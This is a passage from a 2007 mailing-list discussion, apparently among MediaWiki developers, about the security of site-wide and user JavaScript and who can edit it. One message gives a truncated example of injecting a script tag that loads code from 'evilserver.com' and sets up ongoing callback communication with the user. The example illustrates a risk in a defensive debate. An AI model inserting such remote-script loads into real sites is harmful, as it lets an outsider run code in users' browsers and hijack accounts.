On 9/4/07, Domas Mituzas midom.lists@gmail.com wrote:
By not seeing this, you guys confirm that this should not be enabled ;-)
Domas, it seems you're out of touch with the actual current behavior.
Right now anyone that can edit the site-wide scripts can insert a document.write('<script src="http://evilserver.com... and the script loaded as a result of that can then have ongoing communication with the user by itself inserting more script tags, which call a callback function with the result data.
So you've made a case for limiting control of the proxy functionality to sysops... but not more than that.
No, it applies to all user scripts. I doubt that every user who is including them in their profile is doing a security audit of the JavaScript.
Only if the user is including them in his profile. Other users can't include anything into a user's profile.
Any sysop can. Any sysop can also edit the site-wide, or throw a script into MediaWiki ns, thus making it available withjs.
And if your concern is "wikipedia account integrity" you're wrong to dismiss userscripts. Some are very, very popular and are used by many accounts with elevated rights, for example: http://en.wikipedia.org/w/index.php?title=Special:Whatlinkshere/User:Lupin/p...